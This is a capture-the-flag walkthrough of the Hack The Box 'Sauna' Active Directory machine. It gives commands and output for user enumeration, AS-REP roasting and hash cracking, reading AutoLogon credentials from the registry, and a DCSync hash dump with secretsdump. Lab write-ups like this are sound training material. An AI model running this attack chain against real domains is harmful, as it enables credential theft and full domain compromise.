This box start off with port 80 open. Enumeration of the website returns users upon a page. Kerberoasting proves successful as you retrieve the hash of user fsmith. Once the hash is cracked we are able to gain access to the machine. Doing the steps to escalate privilege we come across cached credentials used by WinLogon found in Registry for user svc_loanmanager, we get the credentials using PowerShell. After looking at the user in Bloodhound, we find the user has GetChangesAll to the domain. This allows the user to DCSync and dump all the hashes for the domain.

Initial Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PORT     STATE SERVICE       REASON          VERSION                                   
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus                           
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0                  
|_http-title: Egotistical Bank :: Home                                                
| http-methods:                                                                       
|   Supported Methods: OPTIONS TRACE GET HEAD POST                                     
|_  Potentially risky methods: TRACE                                                  
|_http-server-header: Microsoft-IIS/10.0                                              
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-10 21:23:01Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC                     
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn             
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127                                          
464/tcp  open  kpasswd5?     syn-ack ttl 127                                          
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0       
636/tcp  open  tcpwrapped    syn-ack ttl 127                                          
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127                                          
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

From the looks of the scan, we dealing with Active Directory. šŸ˜šŸ˜Ž

Port 80 is open as well, maybe ADCS. Lets see.

HTTP - EgotisticalBankingā€¦funny

So we look through the website and much of it is ending in .html, so not very useful. Yet there is a about us section, which has some people on it and their names. We can gather these and try them.

1
$ curl -s http://10.10.10.175/about.html | html2text | grep -i Fergus -A5 > users.lst


Now we need to spice it up a bit, we can create a list of potential usernames with username-anarchy.

1
$ username-anarchy -i users.lst > users.list

Kerberoasting the lot of ā€˜em

We can see if any usernames are valid.

1
2
3
4
5
6
$ kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 users.list
<SNIP>
2025/05/10 12:05:48 >  Using KDC(s):
2025/05/10 12:05:48 >   10.10.10.175:88

2025/05/10 12:05:48 >  [+] VALID USERNAME:       fsmith@egotistical-bank.local

Lets see if fsmith has Do not require Kerberos preauthentication set, might get an easy win.

1
2
3
4
5
6
$ GetNPUsers.py -dc-ip 10.10.10.175 'egotistical-bank.local/fsmith' -outputfile ./fsmith.hash
Name    MemberOfPasswordLastSet             LastLogon                   UAC      
------  ------------------------------------------------------------------  --------------------------  --------------------------  --------
FSmith  CN=Remote Management Users,CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL  2020-01-23 10:45:19.047096  2025-05-10 19:10:08.254342  0x410200 

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:<SNIP>

This does get us user fsmithā€˜s hash. We can crack it with hashcat and get a cleartext password (-m 18200). After that we run a bloodhound dump and see what privileges our user has on the box. 

1
2
3
4
5
--HashCat--
$ hashcat -a 0 -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt

--BloodHound--
$ nxc ldap egotistical-bank.local -u fsmith -p <SNIP> --bloodhound -c All --dns-server 10.10.10.175

BloodHound the big Angry Dog

Looking at our user fsmith, we donā€™t have anything useful to escalate our privilege, but we are apart of the Remote Management Users group. That being a start we can make our way onto the box.

Weā€™ll come back when we have more!!

Evil things are happening

Once on the box, we do some basic enumeration (i.e. net tools, uncommon installed programs, checking registry, and services). We happen to find a AutoLogon assigned to user svc_loanmanager.

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\FSmith\Documents> Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\' -Name "DefaultUserName"


DefaultUserName : EGOTISTICALBANK\svc_loanmanager
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName     : Winlogon
PSDrive         : HKLM
PSProvider      : Microsoft.PowerShell.Core\Registry

We can actually obtain the password using the same command just specify DefaultPassword for the Name parameter.

1
2
3
4
5
6
7
8
9
Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\' -Name "DefaultPassword"


DefaultPassword : <SNIP>
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName     : Winlogon
PSDrive         : HKLM
PSProvider      : Microsoft.PowerShell.Core\Registry

Back to the Future at least to BloodHound

Looking for this user in bloodhound, we donā€™t find svc_loanmanager, yet we do see svc_loanmgr. We see his privileges are much more dangerous. He has GetChangesAll allowing for our user to DCSync with the domain and dump hashes.

Dumping everything

Finally, with secretsdump we collect the Administrator hash.

1
2
3
4
5
6
7
8
9
10
11
secretsdump.py -dc-ip 10.10.10.175 'egotistical-bank.local/svc_loanmgr@egotistical-bank.local'
<SNIP>
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                                                 
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
<SNIP>